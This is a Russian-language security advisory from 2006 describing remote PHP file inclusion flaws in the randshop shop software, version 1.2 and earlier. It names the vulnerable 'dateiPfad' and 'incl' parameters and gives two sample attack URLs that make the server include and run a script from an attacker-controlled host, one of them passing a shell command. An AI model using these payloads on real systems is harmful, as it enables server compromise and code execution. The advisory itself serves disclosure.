PHP-инклюдинг в randshop

Дата публикации:
06.07.2006
Дата изменения:
06.04.2009
Всего просмотров:
2304
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-3537
CVE-2006-3375
CVE-2006-3374
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
randshop 1.x
Уязвимые версии: randshop 1.2 и более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре ”dateiPfad” в сценарии includes/header.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://[target]/[path]/includes/header.inc.php? dateiPfad=http://[attacker]/cmd.txt?&cmd=ls

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре ”incl” в сценарии index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://victim/randshop/index.php?incl=http://evilscript?

URL производителя: www.randshop.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: randshop <= 1.1.1 Remote File Inclusion Vulnerability
file include exploits in randshop v1.2

или введите имя

CAPTCHA